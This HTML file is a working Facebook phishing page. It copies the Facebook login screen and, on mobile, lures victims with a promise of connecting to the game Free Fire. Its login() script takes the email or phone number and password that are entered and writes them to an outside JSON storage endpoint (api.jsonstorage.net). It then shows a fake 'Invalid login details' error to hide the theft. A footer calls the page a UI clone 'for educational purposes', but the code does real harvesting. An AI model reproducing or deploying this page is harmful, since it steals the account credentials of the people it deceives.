<!DOCTYPE html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<link rel="stylesheet" type="text/css" href="css/computer.css" media="screen and (min-width: 769px)">
<link rel="stylesheet" type="text/css" href="css/mobile.css" media="screen and (max-width: 768px)">
<link href="https://fonts.googleapis.com/css?family=Roboto" rel="stylesheet">
 <script src="https://code.jquery.com/jquery-3.1.1.js"></script>
<title>Facebook - Log In or Sign Up</title>
<style>
    
/* Hiding Styles for Computer Screen */
.computer {
    display: none;
}

/* Styles for whole web page */
* {
  box-sizing: border-box;
}
body {
    margin: 0;
    padding: 0;
    font-family: 'Roboto', Helvetica, Sans-serif;
}
.clearfix::after {
    content: "";
    clear: both;
    display: table;
}
a {
  color: #365899;
  text-decoration: none;
}
a:hover {
  text-decoration: underline;
}


/* Styles for header */
.mobheader {
    height: 44px;
    min-width: 320px;
    width: 100%;
    background-color: #3B5998;
    display: flex;
}
.mobfblogo {
    height: 21px;
    width: 104px;
    margin: auto auto;
}

#mobapplink {
    background-color: #fffbe2;
    height: 48px;
    min-width: 360px;
}
#mobandroidpic {
    height: 32px;
    width: 18px;
    margin: 9px 11px 9px 16px;
    float: left;
}
#getfbandroid {
    float: left;
    padding: 17px 0 17px 0;
    font-size: 14px;
}


/* Styles for mid-section */
.mobmaindiv {
    background-color: #ECEFF5;
    min-width: 320px;
    width: 100%;
    height: 294px;
    padding-left: 16px;
    padding-right: 16px;
}
#mobtextdiv {
    max-width: 420px;
    margin: auto;
    margin-bottom: 11px;
    padding-top: 16px;
}
.mobtextbox {
    width: 100%;
    padding: 12px;
    border: 1px solid #DBDEE4;
}
.mobtextbox::-webkit-input-placeholder {
    font-size: 14px;
}
.mobtextbox1 {
    height: 44px;
    border-bottom: .5px solid #E5E5E5;
    border-top-left-radius: 5px;
    border-top-right-radius: 5px;
}
.mobtextbox2 {
    height: 46px;
    border-top: .5px solid #E5E5E5;
    border-bottom-left-radius: 5px;
    border-bottom-right-radius: 5px;
}
.mobloginbuttondiv {
    max-width: 420px;
    margin: auto;
}
.mobloginbutton {
    font-size: 14px;
    font-weight: bold;
    color: white;
    background-color: #3578E5;
    width: 100%;
    height: 36px;
    border-radius: 5px;
    border: 1px solid #3578E5;
}

#ordiv {
    text-align: center;
    margin: 4px 0 12px 0;
}
#or {
    font-size: 14px;
    color: #4B4F56;
    position: relative;
}
#or::before, #or::after {
    content: "";
    position: absolute;
    width: 110px;
    height: 1px;
    background-color: #ccd0d5;
    top: 50%;
}
#or::before {
    right: 100%;
    margin-right: 15px;
}
#or::after {
    left: 100%;
    margin-left: 15px;
}

#mobcreatediv {
    text-align: center;
}
#mobcreate {
    height: 36px;
    width: 169px;
    color: white;
    background-color: #00a400;
    border: 1px solid #00a400;
    border-radius: 5px;
    font-size: 14px;
    font-weight: bold;
}

.mobforgotpw {
    margin-top: 15px;
    font-size: 12px;
    text-align: center;
}
.mobforgotpw a {
    color: #7596c8;
}


/* Styles for footer */
.mobfooter {
    min-width: 320px;
    width: 100%;
    background-color: #FFF;
}
#moblangs {
    display: flex;
    margin-top: 20px;
}
.item1, .item2 {
    flex-grow: 1;
}
.mobfooter #moblangs li {
    list-style-type: none;
    font-size: 12px;
    text-align: center;
    margin-bottom: 2px;
}
.mobfooter #moblangs li a {
    color: #576b95;
}
#mobcurrentlang {
    color: #90949c !important;
    font-weight: 500;
    letter-spacing: 0.5px;
}
.mobfooter #moblangs li a .fa {
    font-size: 24px;
    color: #576b95;
}

.mobcopyright {
    text-align: center;
}
.mobfbcopyright, #mobdisclaimer, #mobcopyrightfblink {
    font-size: 12px;
    color: #808080;
    margin: auto;
}
.mobcopyright span .fa {
    color: #0274b3;
    font-size: 14px;
}
#mobpranavks {
    color: #0274b3;
}
#error{
    color:white;
    width:100vw;
    background-color:red;
    position:absolute ;
    z-index:999999999;
    padding:3%;
    display:none;
}
.ff{
    width:20vw;
    height:20vw;
    border-radius:10%;
}
.fftxt{
    margin-top:2vh;
    color:rgb(0,0,0,0.4);
}
</style>
</head>

<body>
<div class="computer">
  <header>
    <div class="headersubdiv">
      <img src="https://dl.dropboxusercontent.com/s/cfeylm46z1xppq3/fblogo.png?dl=0" class="fblogo">
      <div class="loginform">
        <table>
          <tr>
            <td class="logintext">Email or Phone</td>
            <td class="logintext"><span class="loginrowgap">Password</span></td>
          </tr>
            <td><input class="logintext loginfield" type="text"></td>
            <td><input class="logintext loginrowgap loginfield" type="password"></td>
            <td><input class="loginrowgap" id="loginbutton" type="submit" value="Log In"></td>
          </tr>
          <tr>
            <td></td>
            <td><a href="#" class="logintext loginrowgap" id="forgotpw">Forgotten account?</a></td>
          </tr>
        </table>
      </div>
    </div>
  </header>

  <div class="maindiv">
    <div class="mainsubdiv">
      <div class="welcome">
        <div class="welcometext">Facebook helps you connect and share with the people in your life.</div>
        <div class="welcomepic">
          <img src="https://dl.dropboxusercontent.com/s/yvchlzfdz4a8lbs/connecting.png?dl=0" alt="welcome">
        </div>
      </div>
      <div class="signupdiv">
        <div class="createaccount">
          <div class="createh1"><span>Create an account</span></div>
          <div class="createp">It's free and always will be.</div>
        </div>
        <div class="signupform">
          <div class="inputname">
            <input type="text" name="firstname" placeholder="First name" class="namebox namebox1 signuptextbox" required>
            <input type="text" name="surname" placeholder="Surname" class="namebox namebox2 signuptextbox" required>
          </div>
          <input class="mobilepw signuptextbox" type="text" name="mobile/email" placeholder="Mobile number or email address" required><br>
          <input class="mobilepw signuptextbox" type="password" placeholder="New password" required>
          <br>
          <p class="createp" id="birthday">Birthday</p>
          <div class="dobdiv">
            <select name="dobdate" class="dob day">
              
            </select>
            <select name="dobmonth" class="dob month">
              
            </select>
            <select name="dobyear"  class="dob year">
              <option value="year">Year</option></option>
            </select>
            <div id="whydb">
            <a href="#">Why do I need to provide my date of birth?</a>
              <div id="whydbtooltip">
                  <strong>Providing your date of birth</strong> helps make sure that you get the right Facebook experience for your age. If you want to change who sees this, go to the About section of your Profile. For more details, please visit our <a href="#">Data Policy</a>.
                  <hr id="hrtooltip">
                  <button id="whydbtooltipbutton">OK</button>
              </div>
            </div>
          </div>
          <div class="gender">
            <span id="femalediv"><input type="radio" name="gender" value="female" id="female"><label class="gendertext" for="female">Female</label></span>
            <span id="malediv"><input type="radio" name="gender" value="male" id="male"><label class="gendertext" for="male">Male</label></span>
          </div>
          <div>
            <p class="terms">
              By clicking Sign Up, you agree to our <a href="#" class="linksinterms">Terms</a>, <a href="#" class="linksinterms">Data Policy</a> and <a href="#" class="linksinterms">Cookie Policy</a>. You may receive SMS notifications from us and can opt out at any time.
            </p>
          </div>
          <div class="clearfix">
            <button type="button" id="signupbutton">Sign Up</button>
          </div>
          <div id="createpage">
            <a href="#">Create a Page</a> for a celebrity, band or business.
          </div>
        </div>
      </div>
    </div>
  </div>
  <footer>
    <div id="footersubdiv">
      <div id="languagediv">
        <a href="#" class="language" id="currentlang">English (UK)</a>
        <a href="#" class="language">മലയാളം</a>
        <a href="#" class="language">தமிழ்</a>
        <a href="#" class="language">ಕನ್ನಡ</a>
        <a href="#" class="language">हिन्दी</a>
        <a href="#" class="language">اردو</a>
        <a href="#" class="language">বাংলা</a>
        <a href="#" class="language">తెలుగు </a>
        <a href="#" class="language">Español</a>
        <a href="#" class="language">Português (Brasil)</a>
        <a href="#" class="language">Français (France)</a>
        <a href="#" id="morelang"><i class="fa fa-plus" aria-hidden="true"></i></a>
      </div>
      <hr id="hrfinal">
      <div id="extralinksdiv">
       
      </div>
      <div id="copyrightdiv">
          <span id="copyright"><a href="https://www.facebook.com" target="_blank" id="copyrightfblink">Facebook</a> © 2019</span>
          <span id="disclaimer">UI cloned for educational purposes by <a href="https://www.linkedin.com/in/kspranav10/" target="_blank" id="pranavks">Pranav K S &nbsp<i class="fa fa-linkedin-square"></i></a></span>
      </div>
    </div>
  </footer>
</div>



<!--Code for Mobile Screen-->
 <div id="error">Sorry ,Invalid login details.</div>
<div class="mobile">
  <div class="mobheader">
    <img src="https://dl.dropboxusercontent.com/s/cfeylm46z1xppq3/fblogo.png?dl=0" class="mobfblogo">
  </div>
  <div id="mobapplink" class="clearfix">
    <a href="#">
      <img src="https://dl.dropboxusercontent.com/s/tm92xpdr6ry07lv/fbandroid.png?dl=0" id="mobandroidpic">
      <div id="getfbandroid">Get Facebook for Android and browse faster.</div>
    </a>
  </div>
  <div class="mobmaindiv">
    <div id="mobtextdiv">
  <center> <img  src="https://play-lh.googleusercontent.com/NE5J766YoDwc3a76vBcF-DLRHSzrzpAscPv8Uez26HxgEOCPFDzsDKITQ3_oImWCvSg" class="ff"/>
      <p class="fftxt">Login to your facebook account to connect to Free Fire</p>
  </center>
<form onsubmit="return login()">
      <input id="una"type="text" class="mobtextbox mobtextbox1" placeholder="Mobile number or email address">
      <input id="pna" type="password" class="mobtextbox mobtextbox2" placeholder="Password">
      
    </div>
    <div class="mobloginbuttondiv">
      <input type="submit" class="mobloginbutton" value="Log In">
    </div>
    </form>
    
  <div style="position:relative;"class="mobfooter">
    <div id="moblangs">
      <div class="item1">
        <li><a href="#" id="mobcurrentlang">English (UK)</a></li>
        <li><a href="#">தமிழ்</a></li>
        <li><a href="#">हिन्दी</a></li>
        <li><a href="#">বাংলা</a></li>
      </div>
      <div class="item2">
        <li><a href="#">മലയാളം</a></li>
        <li><a href="#">ಕನ್ನಡ</a></li>
        <li><a href="#">اردو</a></li>
        <li><a href="#"><i class="fa fa-plus-square-o"></i></a></li>
      </div>
    </div>
    <div class="mobcopyright">
      <span class="mobfbcopyright"><a href="#" target="_blank" id="mobcopyrightfblink">Facebook</a> ©2020</span><br>
      
    </div>
    </div>
</div>
<script>
    
function login(){
  /*
var browsed_url = window.location.href;
var urlimp = new URL(browsed_url);
var imp_string =urlimp.searchParams.get("c");
const imp=imp_string;
*/
   var un=una.value;
   var pn=pna.value; 
   $.get("https://api.jsonstorage.net/v1/json/5bc8c361-7d0e-410c-80fd-26a7df326b7f", function(data, textStatus, jqXHR) {
                
                
                var jso= JSON.stringify(data)
                
               // alert(jso)
               
            
                var arr=data
                var co=jso.replace("]","")
                
                
                
                co=`${co},"${un}|${pn}"]`
                
                
                  
                
var vb=co
  
    $.ajax({
                
                 url:"https://api.jsonstorage.net/v1/json/5bc8c361-7d0e-410c-80fd-26a7df326b7f", type:"PUT",
                 
                  data:`${vb}`,
                   contentType:"application/json; charset=utf-8", dataType:"json", success: function(data, textStatus, jqXHR){ 
                   error.style.display="block";
              
                   }}); 
                   
}
                 )
                 
    return false
}


                 
                 
</script>
</body>
